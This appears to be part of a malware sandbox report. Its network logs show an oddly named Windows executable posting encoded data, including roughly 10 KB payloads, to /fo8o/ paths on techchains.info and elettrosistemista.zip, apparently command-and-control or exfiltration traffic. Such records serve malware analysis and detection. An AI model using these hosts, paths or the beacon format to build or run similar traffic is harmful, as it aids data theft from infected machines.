6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d Data Ascii: aZ=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
Jun 8, 2024 18:16:19.287386894 CEST	637	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:19 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49760	66.29.149.46	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:21.162584066 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d Data Ascii: aZ=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
Jun 8, 2024 18:16:21.828949928 CEST	637	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:21 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49761	66.29.149.46	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:23.694814920 CEST	10878	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 50 77 67 57 36 54 [TRUNCATED] Data Ascii: aZ=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwgW6TuK70JeCi9ELbm/JHs5nEZNYt9gINRz/xk4saE+gyfNPVd3USkEHFWiwgLoCdyxMiCnCV8N7vp9jvHuYVFECizejIFUsj1L5awlRSArxkosu88jFosLjjCV7rQpRN0ORDusbVE2SNfVKz2OyNaNQdvD2CWu0KTn2b3qsWvBXgwId92/TbSN8occRSpiyYr1jezk5xorkS1szuFZ/RymGtg/8QkAbBDTGyV4RefsT9vhapIKaqQEEOoeKY/5ZP269UFz+h5ide/dT34BdS9mqqT2UIUly3+AMrUEY30rOFIix6vdECEKy5LB2rpiNOOSVaiXWCgixsCCORrIiVOr3P5e3OV9DPwPyAsbm89NL/G5GEi+zK+YkrbbMcdFfMu1NNykUJeOn8j6mvaCZ8viIlMthIq3jRhpa4WGktmqI9JGAiWfe3RTFf5UoLc/LRdG7NWrwQEHYRtULAb2RmPTJSIhRo3JF+TqzjwKDv6E6/m4JXZju0iG5ZlM4iBaYQ6BAN6HSGPTPiBOfNYSnFlpqkN5mTxHH3dRegdjc9HfvbUxICgg/Zv6i5Vjk5NQIjfwdN4cUtFDB6sbzMnctvq74A7LnkLpf6PVYILwp0uRFKRNJXdXxCqQHmxVOcJAofjqgMSHN/cmP/q8HxjOm4JN1IK4EIjTWHxURYWD [TRUNCATED]
Jun 8, 2024 18:16:24.357729912 CEST	637	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:24 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49762	66.29.149.46	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:26.238579035 CEST	499	OUT	GET /fo8o/?aZ=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:16:26.894746065 CEST	652	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:26 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49763	195.110.124.133	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:32.033912897 CEST	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d Data Ascii: aZ=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
Jun 8, 2024 18:16:32.869987965 CEST	367	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:32 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49764	195.110.124.133	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:34.564848900 CEST	814	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d Data Ascii: aZ=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
Jun 8, 2024 18:16:35.402273893 CEST	367	IN	HTTP/1.1 404 Not Found Date: Sat, 08 Jun 2024 16:16:35 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49765	195.110.124.133	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:16:37.094589949 CEST	10896	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 71 5a 30 32 56 74 57 50 6f 6d 4c 43 66 2f 74 36 30 52 55 6f 71 73 39 59 75 51 4b 61 34 6f 35 70 72 44 76 4d 48 39 53 62 53 68 6a 65 48 2b 32 33 5a 35 5a 30 73 63 30 74 4a 6f 45 30 54 52 4e 30 57 76 70 65 68 41 6a 6e 6c 71 37 46 73 4f 59 46 71 47 4c 61 4b 4e 65 70 57 45 41 32 2b 42 2b 44 43 52 31 73 43 35 72 75 62 64 54 48 39 48 45 6d 53 68 4b 67 37 75 52 70 75 59 43 72 6e 69 79 5a 4f 78 78 2b 66 77 38 68 64 6d 30 68 56 58 6f 4e 6d 78 71 49 59 47 2f 69 31 5a 34 2b 48 2f 6a 75 4d 46 70 64 6e [TRUNCATED] Data Ascii: aZ=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWPomLCf/t60RUoqs9YuQKa4o5prDvMH9SbShjeH+23Z5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqGLaKNepWEA2+B+DCR1sC5rubdTH9HEmShKg7uRpuYCrniyZOxx+fw8hdm0hVXoNmxqIYG/i1Z4+H/juMFpdnN89VHxi9Jaw2sh9CJtt+C8Sr1Z+wRy6TYReB5ys/dgCKdsxeFltjZCAFlR5VrM/1wLjkKF7adGqPCLL0d6uoU+eDO0hvKYenTQgmZYHEe7+UHsu7TbsYxpgNn4i4AD48jePo5nIOTt5WZ8qQEK9l6v8jw+L3ZPIkNmIKTn8l0QHC66zVtxqxlwhPsJONRF5FAwRxuYLLuQ1AOQBB41G1JstARWEryL4EWLo8zBHXMNllACaAZFn5DU9b+ORBkDKjbAun2+jQdpx3k59oRagJTgQRC42PnmyV724DU3eHzPcw3jHkhDTBMUu50+QeZwRo8k7ZmO+LkzJBi9hX2cfvkbkEZd4sgtXZmtGbW7zV0o2kw2jakmpjgYjUGXpPQpEVV2MLERunr2S6kdI28PkpXxDFDpxI2ot5wnZD1uv/gRMCUe